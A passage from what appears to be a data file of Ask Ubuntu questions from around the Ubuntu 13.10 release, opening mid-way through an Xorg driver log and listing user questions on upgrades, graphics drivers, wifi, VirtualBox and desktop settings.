] ( ii ) unloading ati [ 33.958 ] ( ee ) failed to load module `` ati '' ( module does not exist , 0 ) [ 33.958 ] ( ii ) loadmodule : `` vesa '' [ 33.958 ] ( ii ) loading /usr/lib/xorg/modules/drivers/vesa_drv.so [ 33.958 ] ( ii ) module vesa : vendor= '' x.org foundation '' [ 33.958 ] compiled for 1.14.1 , module version = 2.3.2 [ 33.958 ] module class : x.org video driver [ 33.958 ] abi class : x.org video driver , version 14.1 [ 33.958 ] ( ii ) unloadmodule : `` vesa '' [ 33.958 ] ( ii ) unloading vesa [ 33.958 ] ( ii ) failed to load module `` vesa '' ( already loaded , 0 ) [ 33.958 ] ( ii ) loadmodule : `` modesetting '' [ 33.959 ] ( ii ) loading /usr/lib/xorg/modules/drivers/modesetting_drv.so [ 33.959 ] ( ii ) module modesetting : vendor= '' x.org foundation '' [ 33.959 ] compiled for 1.14.1 , module version = 0.8.0 [ 33.959 ] module class : x.org video driver [ 33.959 ] abi class : x.org video driver , version 14.1 [ 33.959 ] ( ii ) unloadmodule : `` modesetting '' [ 33.959 ] ( ii ) unloading modesetting [ 33.959 ] ( ii ) failed to load module `` modesetting '' ( already loaded , 0 ) [ 33.959 ] ( ii ) loadmodule : `` fbdev '' [ 33.959 ] ( ii ) loading /usr/lib/xorg/modules/drivers/fbdev_drv.so [ 33.959 ] ( ii ) module fbdev : vendor= '' x.org foundation '' [ 33.959 ] compiled for 1.14.1 , module version = 0.4.3 [ 33.959 ] module class : x.org video driver [ 33.959 ] abi class : x.org video driver , version 14.1 [ 33.959 ] ( ii ) unloadmodule : `` fbdev '' [ 33.959 ] ( ii ) unloading fbdev [ 33.959 ] ( ii ) failed to load module `` fbdev '' ( already loaded , 0 ) [ 33.959 ] ( ii ) vesa : driver for vesa chipsets : vesa [ 33.959 ] ( ii ) modesetting : driver for modesetting kernel drivers : kms [ 33.959 ] ( ii ) fbdev : driver for framebuffer : fbdev [ 33.959 ] ( ++ ) using vt number 7 if i install fglrx , it reads : [ 37.152 ] initializing built-in extension dri2 [ 37.152 ] ( ii ) loadmodule : `` glx '' [ 37.152 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/modules/extensions/libglx.so [ 37.152 ] ( ii ) module glx : vendor= '' advanced micro devices , inc. '' [ 37.152 ] compiled for 6.9.0 , module version = 1.0.0 [ 37.152 ] loading extension glx [ 37.153 ] ( == ) matched fglrx as autoconfigured driver 0 [ 37.153 ] ( == ) matched ati as autoconfigured driver 1 [ 37.153 ] ( == ) matched vesa as autoconfigured driver 2 [ 37.153 ] ( == ) matched modesetting as autoconfigured driver 3 [ 37.153 ] ( == ) matched fbdev as autoconfigured driver 4 [ 37.153 ] ( == ) assigned the driver to the xf86configlayout [ 37.153 ] ( ii ) loadmodule : `` fglrx '' [ 37.153 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/modules/drivers/fglrx_drv.so [ 37.168 ] ( ii ) module fglrx : vendor= '' firegl - amd technologies inc. '' [ 37.168 ] compiled for 1.4.99.906 , module version = 13.10.10 [ 37.168 ] module class : x.org video driver [ 37.168 ] ( ii ) loading sub module `` fglrxdrm '' [ 37.168 ] ( ii ) loadmodule : `` fglrxdrm '' [ 37.168 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/modules/linux/libfglrxdrm.so [ 37.169 ] ( ii ) module fglrxdrm : vendor= '' firegl - amd technologies inc. '' [ 37.169 ] compiled for 1.4.99.906 , module version = 13.10.10 [ 37.169 ] ( ii ) loadmodule : `` ati '' [ 37.169 ] ( ww ) warning , could n't open module ati [ 37.169 ] ( ii ) unloadmodule : `` ati '' [ 37.169 ] ( ii ) unloading ati [ 37.169 ] ( ee ) failed to load module `` ati '' ( module does not exist , 0 ) [ 37.169 ] ( ii ) loadmodule : `` vesa '' [ 37.169 ] ( ii ) loading /usr/lib/xorg/modules/drivers/vesa_drv.so [ 37.169 ] ( ii ) module vesa : vendor= '' x.org foundation '' [ 37.169 ] compiled for 1.14.1 , module version = 2.3.2 [ 37.169 ] module class : x.org video driver [ 37.169 ] abi class : x.org video driver , version 14.1 [ 37.169 ] ( ii ) loadmodule : `` modesetting '' [ 37.170 ] ( ii ) loading /usr/lib/xorg/modules/drivers/modesetting_drv.so [ 37.170 ] ( ii ) module modesetting : vendor= '' x.org foundation '' [ 37.170 ] compiled for 1.14.1 , module version = 0.8.0 [ 37.170 ] module class : x.org video driver [ 37.170 ] abi class : x.org video driver , version 14.1 [ 37.170 ] ( ii ) loadmodule : `` fbdev '' [ 37.170 ] ( ii ) loading /usr/lib/xorg/modules/drivers/fbdev_drv.so [ 37.170 ] ( ii ) module fbdev : vendor= '' x.org foundation '' [ 37.170 ] compiled for 1.14.1 , module version = 0.4.3 [ 37.170 ] module class : x.org video driver [ 37.170 ] abi class : x.org video driver , version 14.1 [ 37.170 ] ( == ) matched fglrx as autoconfigured driver 0 [ 37.170 ] ( == ) matched ati as autoconfigured driver 1 [ 37.170 ] ( == ) matched vesa as autoconfigured driver 2 [ 37.170 ] ( == ) matched modesetting as autoconfigured driver 3 [ 37.170 ] ( == ) matched fbdev as autoconfigured driver 4 [ 37.170 ] ( == ) assigned the driver to the xf86configlayout [ 37.170 ] ( ii ) loadmodule : `` fglrx '' [ 37.170 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/modules/drivers/fglrx_drv.so [ 37.170 ] ( ii ) module fglrx : vendor= '' firegl - amd technologies inc. '' [ 37.170 ] compiled for 1.4.99.906 , module version = 13.10.10 [ 37.170 ] module class : x.org video driver [ 37.170 ] ( ii ) loadmodule : `` ati '' [ 37.170 ] ( ww ) warning , could n't open module ati [ 37.170 ] ( ii ) unloadmodule : `` ati '' [ 37.171 ] ( ii ) unloading ati [ 37.171 ] ( ee ) failed to load module `` ati '' ( module does not exist , 0 ) [ 37.171 ] ( ii ) loadmodule : `` vesa '' [ 37.171 ] ( ii ) loading /usr/lib/xorg/modules/drivers/vesa_drv.so [ 37.171 ] ( ii ) module vesa : vendor= '' x.org foundation '' [ 37.171 ] compiled for 1.14.1 , module version = 2.3.2 [ 37.171 ] module class : x.org video driver [ 37.171 ] abi class : x.org video driver , version 14.1 [ 37.171 ] ( ii ) unloadmodule : `` vesa '' [ 37.171 ] ( ii ) unloading vesa [ 37.171 ] ( ii ) failed to load module `` vesa '' ( already loaded , 0 ) [ 37.171 ] ( ii ) loadmodule : `` modesetting '' [ 37.171 ] ( ii ) loading /usr/lib/xorg/modules/drivers/modesetting_drv.so [ 37.171 ] ( ii ) module modesetting : vendor= '' x.org foundation '' [ 37.171 ] compiled for 1.14.1 , module version = 0.8.0 [ 37.171 ] module class : x.org video driver [ 37.171 ] abi class : x.org video driver , version 14.1 [ 37.171 ] ( ii ) unloadmodule : `` modesetting '' [ 37.171 ] ( ii ) unloading modesetting [ 37.171 ] ( ii ) failed to load module `` modesetting '' ( already loaded , 0 ) [ 37.171 ] ( ii ) loadmodule : `` fbdev '' [ 37.171 ] ( ii ) loading /usr/lib/xorg/modules/drivers/fbdev_drv.so [ 37.171 ] ( ii ) module fbdev : vendor= '' x.org foundation '' [ 37.171 ] compiled for 1.14.1 , module version = 0.4.3 [ 37.171 ] module class : x.org video driver [ 37.171 ] abi class : x.org video driver , version 14.1 [ 37.171 ] ( ii ) unloadmodule : `` fbdev '' [ 37.171 ] ( ii ) unloading fbdev [ 37.171 ] ( ii ) failed to load module `` fbdev '' ( already loaded , 0 ) [ 37.171 ] ( ii ) amd proprietary linux driver version identifier:13.10.10 [ 37.171 ] ( ii ) amd proprietary linux driver release identifier : unsupported-13.101 [ 37.171 ] ( ii ) amd proprietary linux driver build date : may 23 2013 15:49:35 [ 37.171 ] ( ii ) vesa : driver for vesa chipsets : vesa [ 37.171 ] ( ii ) modesetting : driver for modesetting kernel drivers : kms [ 37.171 ] ( ii ) fbdev : driver for framebuffer : fbdev [ 37.171 ] ( ++ ) using vt number 7 i did more installing/removing packages than that . there were a moment when it said : ( ee ) failed to load /usr/lib64/xorg/modules/libglamoregl.so : /usr/lib64/xorg/modules/libglamoregl.so : undefined symbol : _glapi_tls_context also there is init : not found in ~/.xsession-errors : /usr/sbin/lightdm-session : 5 : exec : init : not found actually , i 'm out of ideas . what about you ? : ) upd i 've got the same problem on another machine .
360726	application didnt upgraded after upgrading ubuntu to 13.10	i upgraded my laptop from ubuntu 13.04 to 13.10 . its working like a charm . but i doubt if software-center , file manager , vlc , etc upgraded . still i am not getting the new versions of softwares in software-center . i am not able to see any new features in file managers as was noted on many blogs . vlc still showing the old version 2.0.8 . its being said that its upgraded to vlc 2.1 or just a dist-upgrade would do the job . but it did n't . also i need to know the default applications ( with version ) provided by ubuntu 13.10 kindly help .
360727	why my monitor is so dark when ubuntu starts ?	my problem is that my monitor is very dark when ubuntu starts . i can change it in bright and lock but some time is so dark that i can not find the mouse arrow . can somebody tell me a way to setup this stuff to stay with the most brightness ? thanks very much to all of you ! ! ! big hug ! ! !
360728	different set of workspaces for each monitor ? ubuntu 13.04 with unity	currently for my new setup , i have a 3 monitor setup . with an nvidia geforce gtx 770 ( if this matters for this ) . what i 'm wanting to do , is to create a separate set of workspaces for each monitor . for instance : monitor 1 has a set of 4 workspaces , that are specific to monitor 1 , and change independently of the other monitors . then the other 2 monitors also have their own set of 4 workspaces . so in total i would have 12 workspaces , but each monitor would have it 's own set of 4 that work independently from the others . i 've read things about xmonad and xinerama , but i 'm not really sure where to go from here . i have n't ventured to far into different window managers and everything . i 'm sure there 's not a tool that does this , but if someone could point me in the right direction ( i 've been using ubuntu for about 4 years so i can figure some things out on my own too ) .
360729	vbox failed to open/create the internal network after upgrading to ubuntu 13.10	every thing was perfect i have 2 guest virtual machines ( ubuntu server 12.04 and win 7 ) on ubuntu 13.04 but after upgrading host to 13.10 i ca n't start them with bridged network adaptator ... . failed to open/create the internal network 'hostinterfacenetworking-wlan0 ' ( verr_intnet_flt_if_not_found ) . failed to attach the network lun ( verr_intnet_flt_if_not_found ) . c贸digo resultado : ns_error_failure ( 0x80004005 ) componente : console interfaz : iconsole { db7ab4ca-2a3f-4183-9243-c1208da92392 } vbox 4.2.12 may you help me ?
360731	upgrade to 13.10 dies	when upgrading from ubuntu 13.04 to 13.10 , the upgrade process dies at the screen the displays the message `` downloading release upgrade tool '' steve
360732	ubuntu 13.04 under parallels desktop - black desktop after x windows update	i have been running ubuntu 13.04 successfully on a macbook pro in a virtual machine in parallels desktop 9 . today ( 2013-10-17 ) after applying today 's ubuntu update , which included updates to x windows , my ubuntu 13.04 virtual machine launches , the launcher comes up , but the screen background is solid black , rather than the shaded orange colour of the default desktop background ( and my desktop icons are `` hidden behind this blackness '' , as well ) . i can launch applications from the launcher , and there is a very brief white flash on the screen , and then it returns to black . it 's as if there is a `` black blanket '' covering the entire screen , so there is no way to interact with any application windows using the keyboard or mouse . the icons of the launcher are responsive to the mouse , so i can right-click and quit any application i have launched . but the rest of the screen is non-responsive to keyboard or mouse . this same behaviour happens with two different versions of parallels tools , so i am quite sure this is not a parallels problem per se , although i could believe that it could be a paroblem with the interface between parallels and this new updated x windows code . could anyone tell me what has happened , and how i might be able to fix this problem , so i can continue to use my ubuntu 13.04 virtual machine ? ( i do have the option of reverting to a previous version of my virtual machine from before this update , but if possible i would prefer to keep my version of ubuntu 13.04 up to date with the latest updates . ) thanks , bob
360734	where can i find more ubuntu 13.10 unity scopes	i want to find more unity scopes for ubuntu 13.10 because i am new to ubuntu and i want to use lots of unity scopes , if you can help me find some that would be awesome .
360735	what are all the possible commands on ubuntu touch ?	i 'm trying to figure what commands are available in ubuntu touch before i think about installing it on my phone . i 've figured out that apt-get is there . but what about dd , top and ssh etc. , etc. ? can someone give me a list ? it should be as simple as typing in the terminal : ls /usr/bin/ thank you in advance .
360737	how to reinstall ubuntu on acer c7 chromebook	i installed chrbuntu 13.04 recently and it works great , however i was updating some programs when a pop-up appeared asking if i wanted to upgrade to the newest version . i didnt realize that it was still unstable and buggy . i am unsure on how to do this . ive been told that i need to wipe the ubuntu partition completely but i dont see why that is neccesary . basically i want to remove ubuntu 13.10 and use the partition it is installed on to install 13.04 . sorry for being a noob on linux but i hope you can help , and thanks for your time .
360739	hoverzoom not working after 13.10 installation	after installing 13.10 earlier , hoverzoom stopped working . i reinstalled hoverzoom and chromium and did a full restart , but no change .
360741	ubuntu not appearing in boot loader [ new ]	i installed ubuntu in a separate partition , along side windows 8.1 . however , ubuntu/grub does not appear in the boot loader . when i hold shift at startup , the regular boot loader ( the one before i installed ubuntu ) appears with only windows 8.1 as a boot option . i already tried the the boot repair from a live usb , but nothing has changed . i have two partitions , one is a journaling file system ( mounted on / ) and the other is the swap . i read that it may be because windows does n't recognize the file system , but i do n't know what to do about it . i do n't know what i did wrong . did i mount it in the wrong place ? any help would be appreciated . ( if the problem is stupid , i apologize . i 'm completely new to installing ubuntu , and i could not find very detailed instructions . ) edit : in case this has any relevance , safe boot is disabled .
360742	root password not recognized	i got kubuntu 12.04 on my laptop , but everytime i try t update , install or something like that it does not recoginze my password , here is what the konsole says ... ernesto @ neto-desktop : ~ $ sudo apt-get update [ sudo ] password for ernesto : sorry , try again . [ sudo ] password for ernesto : sorry , try again . [ sudo ] password for ernesto : sorry , try again . sudo : 3 intentos de contrase単a incorrectos ernesto @ neto-desktop : ~ $ and no advance from there , i am some kind of new for this version ( 12.04 precise pangolin ) and i m not sure what is next , thanks in advance for the help and answers !
360745	trying to install desmume on ubuntu and having problems using it	i downloaded from the ubuntu software center , but no interface will pop up . the rom works , i just ca n't play it . i 'm not able to interact with the window . it just sits there with the game boot screen . i 've tried to install it using the terminal , but i just ca n't figure it out . please help .
360748	how do i move the task bar back to the bottom where it belongs ?	how do i move the task bar back to the bottom of the screen where it belongs from it 's stupid placement on the left . i wo n't use ubuntu as long as it has to be in the way where it is now .
360749	how to make speakers work on sony pro 11 ?	i 've installed ubuntu 13.10 on sony pro 11 laptop . everything works fine except for the speakers ( both speaker and the headphone plug ) . following is the output of running the cat /proc/asound/cards command : 0 [ mid ] : hda-intel - hda intel mid hda intel mid at 0xf7f14000 irq 62 1 [ pch ] : hda-intel - hda intel pch hda intel pch at 0xf7f10000 irq 61 do anyone know how to solve it ?
360751	how to install proprietary plugin for printer installation on an arm based system ?	we are using the hp laserjet printer . details as provided below : linux version : 3.2.0 model no . : hp laserjet p1108 we were successful in installing the printer on linux based on x86 architecture . we used the hp-setup and hp-plugin utility and were able to print the test page from the same . query : is there any support available for the installation of the proprietary plugin required for printing on the arm based system ? if yes , please let us know the steps for the installation . if no , then is there any other method by which we can install the proprietary plugin on the arm based system ?
360753	where do i change the screensaver options in 13.04 ?	i 'm having a problem with the screen blanking every 10 minutes . i 've tried every fix suggested on ask ubuntu but nothing has worked . i typed $ xset -q $ xset -q keyboard control : auto repeat : on key click percent : 0 led mask : 00000000 xkb indicators : 00 : caps lock : off 01 : num lock : off 02 : scroll lock : off 03 : compose : off 04 : kana : off 05 : sleep : off 06 : suspend : off 07 : mute : off 08 : misc : off 09 : mail : off 10 : charging : off 11 : shift lock : off 12 : group 2 : off 13 : mouse keys : off auto repeat delay : 195 repeat rate : 47 auto repeating keys : 00ffffffdffffbbf fadfffefffedffff 9fffffffffffffff fff7ffffffffffff bell percent : 50 bell pitch : 400 bell duration : 100 pointer control : acceleration : 2/1 threshold : 4 screen saver : prefer blanking : yes allow exposures : yes timeout : 0 cycle : 0 colors : default colormap : 0x22 blackpixel : 0x0 whitepixel : 0xffffff font path : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/type1 , built-ins dpms ( energy star ) : standby : 0 suspend : 0 off : 0 dpms is enabled monitor is on what has suprised me is that the screen saver still has options set , yet i can not find any screen saver options ? where do i find the screen saver options ?
360755	how can i install ia32-libs and libcurl on ubuntu 13.10 ?	apparently the ia32-libs and libcurl are broken/deleted for saucy , yet i need them for some applications/games . is there any way i can install older versions or a workaround to get those libs ?
360757	keyboard layout switching does n't work in 13.10	yesterday i upgraded my ubuntu into 13.10 . now i ca n't use classical keyboard layout switching ( alt+shift ) . i ca n't even change with settings : new interface does n't save my combination ( alt+shift ) . how i can change it ?
360760	problem running the python code for backup on ubuntu ?	i was trying to run following python code through terminal but something is wrong as it is producing some errors source = [ '/home/akash/ ' , '/home/akash/code ' ] target_dir = '/media ' target = target_dir + os.sep + time.strftime ( ' % y % m % d % h % m % s ' ) + '.zip ' zip_command = `` zip -qr { 0 } { 1 } '' .format ( target , ' '.join ( source ) ) if os.system ( zip_command ) == 0 : print ( 'successful backup to ' , target ) else : print ( 'backup failed ' ) but when i try to run it following error appears zip i/o error : permission denied zip error : could not create output file ( /media/20131019083404.zip ) backup failed
360761	can not get rid of nvidia drivers , restore nouveau driver and get desktop working	i made the mistake of installing the nvidia linux drivers direct from their website . it failed because it could not remove the nouveau driver . next i manually installed the nvidia drivers from the repository which successfully installed the nvidia driver , but the ubuntu desktop does not function ; no launcher , no menu bar , no windows . ( gnome seems to work though ) . so i want to revert back to the vanilla installed nouveau driver . i tried sudo stop lightdm sudo apt-get purge nvidia* sudo apt-get install xserver-xorg-video-nouveau sudo rm /etc/x11/xorg.conf sudo reboot but lshw -c video reveals i still have one nvidia driver and one i915 driver . nouveau has not returned and the desktop will not function . i am considering a complete reinstall , is there anything else to try ? i have followed the other threads with the same issues , but the solutions did not work sudo dpkg-reconfigure xserver-xorg creates an error . sudo apt-get install -- reinstall xserver-xorg.core libgl1-mesa-glx did not make a difference . cccm same .
360764	how do i upgrade to ubuntu 13.10 ?	how do i upgrade ubuntu from 13.04 to 13.10 if there is no upgrade button on my update manager panel ?
360765	how to set the side bar of nautilus	i want custom the folder links ( such as : remove the music folder link and add /bin folder link ) so how can i do ? another question : how can i remove the folder in my home folder ( such as music download and so on ) forever
360767	sharing folders between windows 8 as host and ubuntu 13.10 as guest in virtualbox	sharing folders between windows 8 as host and ubuntu 13.10 as guest in virtualbox 4.2.18 r88780 with adequate rights on the guest side . the shared folders in /media/sf_ appeared empty , with nautilus returning an endless `` loading ... '' message ( my own transaltion of french `` chargement ... '' ) . in the terminal , the ls command returns nothing and suspend the command prompt . any idea ?
360769	busybox shell during installation	i have recently installed ubuntu 12.04.3 lts using wubi for a dual boot . but when i rebooted my laptop ( dell latitude d6100 ) , after a few codes it took me to busybox shell and also displayed something about rootdelay and root ? please help me i really want to install ubuntu .
360771	ca n't fix strange skype noises	i am for a month or so with ubuntu ( running lts 12.04 version on hp pavilion dv3-2155mx ) and i am getting those weird noises in skype ( version 4.2.0.11 ) voice calls . i tried to follow instructions from this thread . this is how my /etc/pulse/default.pa looks : # # # automatically load driver modules depending on the hardware available .ifexists module-udev-detect.so load-module module-udev-detect tsched=0 .else # # # use the static hardware detection module ( for systems that lack udev/hal support ) load-module module-detect tsched=0 .endif but it did n't solve the problem for me . also i tried to reinstall pulseaudio server - still no result . do you have any suggestion how can i fix that noises ? feel free to ask for additional information but with scripts to get it ( as i 'm a newbie ) .
360772	unity is n't starting on 13.10 ( with cinnamon 2.0 installed )	since upgrading to 13.10 , i ca n't log in to unity desktop . light dm works correctly , but attempting to log in tries to start the session then drops back to light . i 've already dropped to terminal ( ctrl+alt+f2 ) and done this : sudo apt-get update sudo apt-get install -- reinstall ubuntu-desktop sudo apt-get install unity logging in as a guest session also fails . logging in to other window managers works with varying degrees of success . note : i have cinnamon 2.0 installed from ppa . i 'm using a 2 monitor setup . also of note is that the session prior to my upgrade to 13.10 the background of unity failed to display at all , instead showing what was there in the screen buffer from the previous frame . the entire os worked correctly otherwise though , so i just ignored it for the session . no other upgrades or even updates were done prior to this occurring . my upgrade path to 13.10 was basically this : install 13.04 alongside windows 7 , use ubuntu as a glorified web browser for a while , get updates ( in preparation for 13.10 ) , install 13.10 . i also used unity tweak tool to change some aspects of unity , particularly auto-hide . any help or ideas would be appreciated , as i 'm typing this on my phone : (
360773	fixing my username and home directory differing	when i installed ubuntu 13.04 a while back , i got into this weird predicament where my username is different from the name of my home directory . essentially , i wanted to call the user datus , while having the computer 's name set to kevin-cx61 for easy identification on my router . the textfields were altering my entries to be similar , but i continued being stubborn and found a way to make them different . the result was this : -ubuntu labels the user as `` kevin '' in the interface -if i was to login in through the terminal , i would have to use `` datus '' -my home folder is labelled as `` datus '' how might i go about changing the username displayed to me ?
360774	how do reactivate ibus after upgrading to ubuntu 13.10	ibus icon does not appear after upgrading to ubuntu 13.10 . i ca n't even find the ibus icon from the dash . may i know how to reactivate the ibus ? thanks .
360777	after upgrade to ubuntu 13.10 , system is very slow	i got an notification for automatic upgrade from 13.04 to 13.10 on two of my systems.. both systems upgraded ok without any errors . while the 64-bit system is working great , the 32-bit system is performing very slowly.. the screen is moving very slowly.. a look at the processes show that a process called compiz is taking must of the cpu cycles ( as high as 70 % ) and that is keeping the cpu utilization to 100 % all the time . please help .
360778	is it save to delete the akonadi file_db_data ?	i do n't use kmail on my ubuntu anymore . i use thunderbird now . still i have this 1.6gb large file ~/.local/share/akonadi/file_db_data i only guess , it is so large , cause my imap folder is about that size and it was created , when i tried out kmail . is that file needed for anything else than kmail ? if i would remove the whole akonadi-server with apt-get remove -- purge kmail akonadi-server would that delete anything i could still use although i do n't use kde anymore ? for example , i still use krusader and some passwords stored there seem to come from the kde-wallet .
360780	hindi fonts problem	i want to practise hindi typing , i have installed hindi fonts how ever when selecting fonts and trying to type in hindi i get only english words following are snapshots you can see i have selected hindi font and image below will show that when i type i only get english words i have also tried creating a .fonts.conf file in my $ home directory as per instructions here http : //www.binarytides.com/display-hindi-unicode-fonts-on-google-chrome-on-ubuntu-linux/ but it did not helped . what can i do , i need to practise typing as we do with english keyboards so i do not want to go for phonetic kind of typing styles , plain typewriter kind of typing.i am on ubuntu 12.04
360782	ssl certificates issue with ubuntu 12.04 as guest os in a windows7 virtual box behind strict firewall	i have set up an ubuntu guest for rails development in a windows7-hosted virtual box . the windows workstation is a behind an extremely strict firewall with often fluctuating rules . the ubuntu host seems to be unable to connect to hosts relying on ssl certificates . the symptoms : trying to connect to https : //google.com via chrome brings up the `` this site 's security certificate is not trusted ! '' error . same with firefox . trying to use curl with a secure site results in : curl : ( 60 ) ssl certificate problem , verufy that the ca cert is ok . details : error : 14090086 : ssl routines : ssl_get_server_certificate : certificate verify failed trying to install ruby gems fails with `` ... certificate verify failed ... error '' any solutions , including instructions on how to diagnose this ? i have tried adding certificated from
360784	compiz plugin ( grid ) does not update in ccsm	i upgraded to 13.10 . compiz itself has been updated properly to 0.9.10.2 , but in ccsm , one* plugin ( grid ) shows up as the old version . i know it has been changed and i can actually see the updated version when i log in with another user . this hints of some kind of a problem with per-user settings ? ( * actually i 'd expect this to involve other if not all other plugins too , but i have simply not yet noticed others . ) so far i have tried : resetting compiz settings to defaults ( gui-way ) does not help completely removing & reinstalling compizconfig-settings-manager and compiz-plugins packages does not help in 13.04 , i had a patched/old version of the plugin , but i doubt it is about that since everything is fine with the other user ( that user account existed already in 13.04 ) . what configuration files i should try deleting ?
360785	how to flash my nexus 4 and install ubuntu 13 ?	i am using nexus 4 . this is my first time that i am installing a custom rom / os . i dont know how to get root access and flash new os . can someone give me the steps ?
360786	exec php command can not execute in ubuntu 12.04	my system is running in ubuntu 12.04 and i already install lamp . i have `` test.sh '' file and that file execute in php through exec ( test.sh ) . the test.sh working fine from terminal but when i tried to execute from php it would not give any output . i also tried shell_exec ( ) but that function also not working . can anybody help me on this issue ?
360788	ubuntu 12.04.3 installer does n't detect my windows7 partition	i wiped out windows8 from my toshiba satellite l840 and installed windows7 ; while trying to install ubuntu 12.04.3 , once i get to the installation type screen , i get just two options : erase disk and install ubuntu or something else . if i try something else the ( 3 ) windows partitions are not detected ( my whole 750gb hard drive appears as unallocated memory ) even if i try to use gparted after quitting the installation , the hard drive still appears completely as unallocated memory ... i came across some discussions on the internet with a similar questions but since even gparted does n't detect correctly my partitions i 'm stuck ... any suggestion ? thank you !
360791	what to do when ubuntu 13.10 64-bit does not boot ?	ubuntu 13.10 will not boot , it wo n't even show the grub menu or ubuntu booting . there is just a purple screen for 20 seconds then a black screen , then the screen says entering power save mode . here are my system specs : intel dq965gf motherboard ( os independant ) , intel core 2 64-bit , 12gb hhd ( sata ) , 200gb hhd ( sata , installed here ) , 250gb hhd ( sata , encrypted with luks ) , 3gb ddr2 ram ( dimm 0 a 1024mb , dimm 1 a 524mb , dimm 0 b 1024mb , dimm 1 b 524mb ) ,2 rewritable dvd drives ( one sata and one ide ) , small floppy drive and car reader , and amd gallium 0.4 . that 's all i know from the top of my head , i have no os to give me more info on the graphics card , but all ubuntu oss worked on my pc from 12.04-13.04 just fine . does this mean will never be able to use ubuntu 13.10 ? i think i am screwed .
360793	how to block my dns on all outhgoing sites except for one ip address ?	i want to block my dns on all outhgoing sites except for one ip address on one computer ? how do i achieve this ?
360794	how to install ubuntu 13.04 in ativ book 9 lite	im trying install ubuntu 13.04 but when installation finished cant start ubuntu please help with bios configuration and how to install ubuntu on this ativ book 9 lite . i try disabling fast boot , disabling secure boot , etc but no result .
360795	mouse arrow disappear after computer wake up from suspend mode in ubuntu 13.10	at ubuntu 13.10 . while i wake up my laptop from suspend mode , my mouse arrow disappear . but still can click on items . is it a bug ? or where should i configure it ?
360798	wifi problems with lenovo g580 on kubuntu-13.04-desktop-amd64	i have a wifi connection problem in lenovo g580 on kubuntu-13.04-desktop-amd64 . ethernet cable is working properly but wifi does'nt connect below are some hardware information sudo lshw -class network gives *-network description : ethernet interface product : ar8162 fast ethernet vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:01:00.0 logical name : eth0 version : 10 serial : 20:89:84:3d : e9:10 size : 100mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm pciexpress msi msix bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=alx driverversion=1.2.3 duplex=full firmware=n/a ip=192.168.0.106 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:16 memory:90500000-9053ffff ioport:2000 ( size=128 ) *-network description : network controller product : bcm4313 802.11b/g/n wireless lan controller vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=bcma-pci-bridge latency=0 resources : irq:17 memory:90400000-90403fff *-network description : wireless interface physical id : 3 logical name : wlan0 serial : 68:94:23 : fa:2c : d9 capabilities : ethernet physical wireless configuration : broadcast=yes driver=brcmsmac driverversion=3.8.0-19-generic firmware=n/a link=no multicast=yes wireless=ieee 802.11bgn lsubs gives bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 003 : id 0489 : e032 foxconn / hon hai bus 002 device 003 : id 04f2 : b2e2 chicony electronics co. , ltd lspci gives 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 2 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation hm76 express chipset lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 01:00.0 ethernet controller : qualcomm atheros ar8162 fast ethernet ( rev 10 ) 02:00.0 network controller : broadcom corporation bcm4313 802.11b/g/n wireless lan controller ( rev 01 ) does anyone knows the solution ? rfkill list all gives 0 : hci0 : bluetooth soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : yes hard blocked : no 2 : ideapad_wlan : wireless lan soft blocked : yes hard blocked : no 3 : ideapad_bluetooth : bluetooth soft blocked : no hard blocked : no
360801	google authenticator for galaxy nexus with ubuntu touch	i 'm en route to try and install ubuntu touch on my galaxy nexus ( gsm-i9250 ) . since i 'm using the google authenticator app in order to access my google account , i 'm afraid that i 'll be locked out of my accounts , has the installation of ubuntu touch succeeds . aside from printing the codes that google provides me with , i wonder if there is some kind of an app for google authenticator for ubuntu touch , or any other workaround that will allow me to access my account ? i assume i wo n't be able to access google play from ubuntu touch , so i wo n't be able to reinstall the native google authenticator app . please note that my question is somehow similar to this one , only i need to use google authenticator on my phone , and not on my laptop , since i do n't always have it with me .
360804	kernel : imklog error return from sys_sycall : 1	after an ubuntu 64 virtual server update from 10.04 to 12.04 , i get the log message in var/log/syslog : kernel : imklog error return from sys_sycall : 1 it 's writing constantly to the log file . syslog , kern.log and kern.log.1 has filled up my disk . so far i just updated the kernel .
